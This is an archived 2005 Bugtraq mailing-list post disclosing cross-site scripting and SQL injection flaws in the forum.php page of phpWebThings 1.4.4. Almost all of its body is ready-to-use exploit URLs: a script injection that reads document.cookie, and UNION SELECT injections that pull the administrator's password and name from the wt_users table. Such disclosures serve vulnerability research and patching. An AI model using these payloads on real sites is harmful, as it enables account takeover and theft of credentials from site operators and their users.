XSS & SQL injection in phpWebThing

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSS & SQL injection in phpWebThing
From: xx_hack_xx_2004@xxxxxxxxxxx
Date: 5 Nov 2005 03:00:11 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Vulnerable: phpWebThings 1.4.4
http://phpwebthings.org

The bug reside in : forum.php 

Exploit :

http://xxx.com/forum.php?forum=[XSS]
http://xxx.com/forum.php?forum=[SQL]

Example :

XSS

http://xxx.com/forum.php?forum='><script>alert(document.cookie)</script>

SQL

For Passowrd

http://xxx.com/forum.php?forum=-1 union select 
password,password,null,null,null,null from wt_users where uid=1/*

For Name

http://xxx.com/forum.php?forum=-1 union select name,name,null,null,null,null 
from wt_users where uid=1/*



Discovery by Linux_Drox

http://www.lezr.com

Best Regards

Prev by Date: Zoomblog <IMG> BBCode Tag JavaScript Injection Vulnerability
Next by Date: Apache Tomcat 5.5.x remote Denial Of Service
Previous by thread: Zoomblog <IMG> BBCode Tag JavaScript Injection Vulnerability
Next by thread: Apache Tomcat 5.5.x remote Denial Of Service
Index(es):
- Date
- Thread